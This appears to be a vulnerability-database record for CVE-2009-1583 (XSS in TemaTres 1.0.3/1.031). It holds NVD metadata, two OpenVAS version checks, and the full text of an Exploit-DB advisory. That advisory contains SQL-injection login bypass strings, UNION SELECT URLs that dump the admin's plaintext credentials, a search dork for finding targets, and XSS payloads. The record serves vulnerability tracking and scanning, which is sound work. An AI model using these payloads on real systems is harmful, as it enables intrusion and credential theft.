ID CVE-2009-1583 Type cve Reporter cve@mitre.org Modified 2018-10-10T19:37:00
Description
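Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php. Note: the enumeration above uses the number (7) twice, so it lists ten injection points rather than nine. The scanner checks included in this record treat TemaTres 1.031 and earlier as affected and give 1.033 or later as the version to upgrade to.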
{"id": "CVE-2009-1583", "bulletinFamily": "NVD", "title": "CVE-2009-1583", "description": "Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php.", "published": "2009-05-07T23:30:00", "modified": "2018-10-10T19:37:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1583", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/34983", "http://secunia.com/advisories/34990", "http://osvdb.org/54247", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50343", "http://www.securityfocus.com/archive/1/503252/100/0/threaded", "http://www.securityfocus.com/bid/34830", "https://www.exploit-db.com/exploits/8615"], "cvelist": ["CVE-2009-1583"], "type": "cve", "lastseen": "2019-05-29T18:09:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "aa39e5e35dbd42d48e9d17e0fa848714"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "8de3bab86f04b1a98d885a2b8cd7f5f7"}, {"key": "cpe23", "hash": "0c656e94f67828b100b1cc58ab1c2d20"}, {"key": "cvelist", "hash": "38dd0d0936fb01b1d3aabf3ac979b2f0"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "25131d66a9f3961140b068f4b41aa42b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "ad1f8a506e27a5bed3286d2ef1f5084d"}, {"key": "href", "hash": "773e8d4d141288ada593470f214ee70f"}, {"key": "modified", "hash": 
"1ca428fc3af04d899761c85377943804"}, {"key": "published", "hash": "7ef995e93881a84cfc1da00e6fa4d6a3"}, {"key": "references", "hash": "96a147656f2eaccb13d350e8ebb9148d"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "358ec1381bb40c663e9e62d0101b72ac"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "e10ead10998d6559428e7076d5db574e2fb0c6893134c2cc940fdae5c5a8210f", "viewCount": 1, "enchantments": {"score": {"value": 4.4, "vector": "NONE", "modified": "2019-05-29T18:09:58"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310800801", "OPENVAS:800801"]}, {"type": "exploitdb", "idList": ["EDB-ID:8615"]}], "modified": "2019-05-29T18:09:58"}, "vulnersScore": 4.4}, "objectVersion": "1.3", "cpe": ["cpe:/a:r020:tematres:1.031", "cpe:/a:r020:tematres:1.0.3"], "affectedSoftware": [{"name": "r020 tematres", "operator": "eq", "version": "1.0.3"}, {"name": "r020 tematres", "operator": "eq", "version": "1.031"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:r020:tematres:1.031:*:*:*:*:*:*:*", "cpe:2.3:a:r020:tematres:1.0.3:*:*:*:*:*:*:*"], "cwe": ["CWE-79"]}
{"exploitdb": [{"lastseen": "2016-02-01T07:46:07", "bulletinFamily": "exploit", "description": "TemaTres 1.0.3 (Auth Bypass/SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-1583,CVE-2009-1584,CVE-2009-1585. Webapps exploit for php platform", "modified": "2009-05-05T00:00:00", "published": "2009-05-05T00:00:00", "id": "EDB-ID:8615", "href": "https://www.exploit-db.com/exploits/8615/", "type": "exploitdb", "title": "tematres 1.0.3 auth bypass/sql/XSS Multiple Vulnerabilities", "sourceData": "***********************************************************************************************\n***********************************************************************************************\n**\t \t\t\t\t\t\t\t\t\t\t **\n** \t\t\t\t\t\t\t\t\t\t\t **\n** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **\n** || || || [] [][] [] [] [] [] [] [] [] []\t [] [] **\n [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **\n** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\\ \n**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--\n** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ \n [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **\n**\t\t\t\t\t\t\t **\n** \t\t\t\t\t\t\t\t\t\t\t **\n** \u00c2\u00a1VIVA SPAIN!...\u00c2\u00a1GANAREMOS EL MUNDIAL!...o.O **\n**\t\t\t\t\t\u00c2\u00a1PROUD TO BE SPANISH!\t\t\t\t **\n**\t\t\t\t\t\t\t\t\t\t\t **\n***********************************************************************************************\n***********************************************************************************************\n\n----------------------------------------------------------------------------------------------\n| \t \t \tMULTIPLE REMOTE VULNERABILITIES\t\t \t |\n|--------------------------------------------------------------------------------------------|\n| \t | TemaTres V1.0.3 |\t\t \t\t |\n| CMS INFORMATION:\t\t 
-----------------\t\t\t\t\t |\n|\t\t\t\t\t\t\t\t\t\t |\n|-->WEB: http://www.r020.com.ar/tematres/ \t \t\t |\n|-->DOWNLOAD: http://sourceforge.net/projects/tematres/ \t \t\t |\n|-->DEMO: http://www.r020.com.ar/tematres/index.php\t\t\t\t\t |\n|-->CATEGORY: CMS / Portals\t\t\t\t\t\t\t\t |\n|-->DESCRIPTION: Web application to manage controlled vocabularies, taxonomies and thesaurus |\n| \t\t/ Aplicaci\u00c3\u00b3n Web para la gesti\u00c3\u00b3n de lenguajes documentales, ... \t |\n|\t\t\t\t\t\t\t\t\t\t\t |\n| CMS VULNERABILITY:\t\t\t\t\t\t\t\t\t |\n|\t\t\t\t\t\t\t\t\t\t\t |\n|-->TESTED ON: firefox 3\t\t\t\t\t\t\t\t |\n|-->DORKs: \"Powered by TemaTres\" / \"Generado por TemaTres\" / \"Criado por TemaTres\"\t |\n|-->CATEGORY: AUTH BYPASS/ SQL INJECTION/ XSS\t\t\t \t\t\t |\n|-->AFFECT VERSION: LAST = 1.0.3 (maybe <= ?)\t\t\t\t\t\t |\n|-->Discovered Bug date: 2009-04-23\t\t\t\t\t\t\t |\n|-->Reported Bug date: 2009-04-23\t\t\t\t\t\t\t |\n|-->Fixed bug date: 2009-05-04\t\t\t\t\t\t\t\t |\n|-->Info patch (v1.0.31): http://www.r020.com.ar/tematres/tematres1.031.zip\t\t |\n|-->Author: YEnH4ckEr\t\t\t\t\t\t\t\t\t |\n|-->mail: y3nh4ck3r[at]gmail[dot]com\t\t\t\t\t\t\t |\n|-->WEB/BLOG: N/A\t\t\t\t\t\t\t\t\t |\n|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |\n|-->EXTRA-COMMENT: Gracias por aguantarme a todos! 
(Te kiero xikitiya!)\t\t\t |\n----------------------------------------------------------------------------------------------\n\n############\n------------\nCONDITIONS:\n------------\n############\n\n\n**gpc_magic_quotes=off\n\n**DBPREFIX='lc_' (Default)\n\n\n####################\n--------------------\nAUTH BYPASS (SQLi):\n--------------------\n####################\n\n\nmail:' or 1=1 /*\npassword: Nothing\n\nOr...\n\nmail: Something\npassword:' or 1=1 /*\n\n\n######################\n----------------------\nSQL INJECTION (SQLi):\n----------------------\n######################\n\n\n~~~~---->Unregistered user (get var --> 'letra'):\n\nhttp://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*\n\n<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>\n\n~~~~---->Resgistered user (get vars --> 'y' and 'm'):\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*&y=2007\n\n<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) 
------------>\n\n\n############################\n----------------------------\nCROSS SITE SCRIPTING (XSS):\n----------------------------\n############################\n\n\nThere are a lot of links (This isn't entire list):\n\n\n~------->Unregistered user\n\n\n<----Search form---->\n\n<script>while(1){alert('y3nh4ck3r was here!')}</script>\n\n\n<----More links---->\n\nhttp://[HOST]/[HOME_PATH]/index.php?_expresion_de_busqueda=<script>alert('y3nh4ck3r was here!')</script>&sgs=off\n\nhttp://[HOST]/[HOME_PATH]/index.php?letra=D<script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?estado_id=14\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?tema=\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?tema=2&/trmino-subordinado-de-ejemplo\"><script>alert('y3nh4ck3r was here!')</script>\n\n\n~------->Registered user\n\n\n<----Posting here---->\n\nhttp://[HOST]/[HOME_PATH]/index.php?edit_id=12&tema=12\n\n<script>alert('y3nh4ck3r was here!')</script>\n\n\n<----More links---->\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007&ord=F\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10\"><script>alert('y3nh4ck3r was here!')</script>&y=2007\n\n\n-------------------EOF---------------------------------->>>ENJOY IT!\n\n\n#######################################################################\n#######################################################################\n##*******************************************************************##\n## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! 
##\n##*******************************************************************##\n##-------------------------------------------------------------------##\n##*******************************************************************##\n## GREETZ TO: JosS, Ulises2k and all spanish Hack3Rs community! ##\n##*******************************************************************##\n#######################################################################\n#######################################################################\n\n# milw0rm.com [2009-05-05]\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8615/"}], "openvas": [{"lastseen": "2017-07-02T21:14:11", "bulletinFamily": "scanner", "description": "The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.", "modified": "2016-12-30T00:00:00", "published": "2009-05-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=800801", "id": "OPENVAS:800801", "title": "TemaTres Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tematres_mult_xss_n_sql_inj_vuln.nasl 4892 2016-12-30 15:39:07Z teissa $\n#\n# TemaTres Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attacks will let the attacker steal cookie-based authentication\n credentials, compromise the application, access or modify data, or can exploit\n latest vulnerabilities in the underlying database when 'magic_quotes_gpc' is\n disabled.\n Impact Level: Application\";\ntag_affected = \"TemaTres version 1.031 and prior\";\ntag_insight = \"Multiple flaws are due to\n - In-adequate check of user supplied input which causes input validation error\n in the search form.\n - Validation check error in accepting user input for the following parameters\n a) _expresion_de_busqueda, b) letra c) estado_id and d) tema e) PATH_TO\n inside index.php.\n - Validation check error in accepting user input for the following parameters\n a) y b) ord and c) m inside sobre.php.\n - Validation check error in accepting user input for the following parameters\n a) mail b) password inside index.php.\n - Validation check error in accepting user input for the following parameters\n a) dcTema b) madsTema c) zthesTema d) skosTema and e) xtmTema inside xml.php.\";\ntag_solution = \"Upgrade to TemaTres version 1.033 or later.\n For updates refer to http://www.r020.com.ar/tematres/index.en.html#indice\";\ntag_summary = \"The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.\";\n\nif(description)\n{\n script_id(800801);\n script_version(\"$Revision: 4892 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-30 16:39:07 +0100 (Fri, 30 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-19 08:03:45 +0200 (Tue, 19 May 2009)\");\n script_tag(name:\"cvss_base\", 
value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-1583\", \"CVE-2009-1584\", \"CVE-2009-1585\");\n script_bugtraq_id(34830);\n script_name(\"TemaTres Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34983\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34990\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8615\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8616\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_tematres_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ntematresPort = get_http_port(default:80);\nif(!tematresPort){\n exit(0);\n}\n\ntematresVer = get_kb_item(\"www/\" + tematresPort + \"/TemaTres\");\ntematresVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:tematresVer);\nif(tematresVer[1] != NULL)\n{\n if(version_is_less_equal(version:tematresVer[1], test_version:\"1.031\")){\n security_message(tematresPort);\n }\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:18", "bulletinFamily": "scanner", "description": "The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.", "modified": "2019-05-14T00:00:00", "published": 
"2009-05-19T00:00:00", "id": "OPENVAS:1361412562310800801", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800801", "title": "TemaTres Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# TemaTres Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800801\");\n script_version(\"2019-05-14T12:12:41+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 12:12:41 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-05-19 08:03:45 +0200 (Tue, 19 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-1583\", \"CVE-2009-1584\", \"CVE-2009-1585\");\n script_bugtraq_id(34830);\n script_name(\"TemaTres Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34983\");\n 
script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34990\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8615\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8616\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_tematres_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"tematres/detected\");\n\n script_tag(name:\"impact\", value:\"Successful attacks will let the attacker steal cookie-based authentication\n credentials, compromise the application, access or modify data, or can exploit\n latest vulnerabilities in the underlying database when 'magic_quotes_gpc' is disabled.\");\n\n script_tag(name:\"affected\", value:\"TemaTres version 1.031 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - In-adequate check of user supplied input which causes input validation error\n in the search form.\n\n - Validation check error in accepting user input for the following parameters\n a) _expresion_de_busqueda, b) letra c) estado_id and d) tema e) PATH_TO inside index.php.\n\n - Validation check error in accepting user input for the following parameters\n a) y b) ord and c) m inside sobre.php.\n\n - Validation check error in accepting user input for the following parameters\n a) mail b) password inside index.php.\n\n - Validation check error in accepting user input for the following parameters\n a) dcTema b) madsTema c) zthesTema d) skosTema and e) xtmTema inside xml.php.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to TemaTres version 1.033 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection 
Vulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ntematresPort = get_http_port(default:80);\n\ntematresVer = get_kb_item(\"www/\" + tematresPort + \"/TemaTres\");\ntematresVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:tematresVer);\nif(tematresVer[1] != NULL)\n{\n if(version_is_less_equal(version:tematresVer[1], test_version:\"1.031\")){\n security_message(tematresPort);\n }\n}\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}]}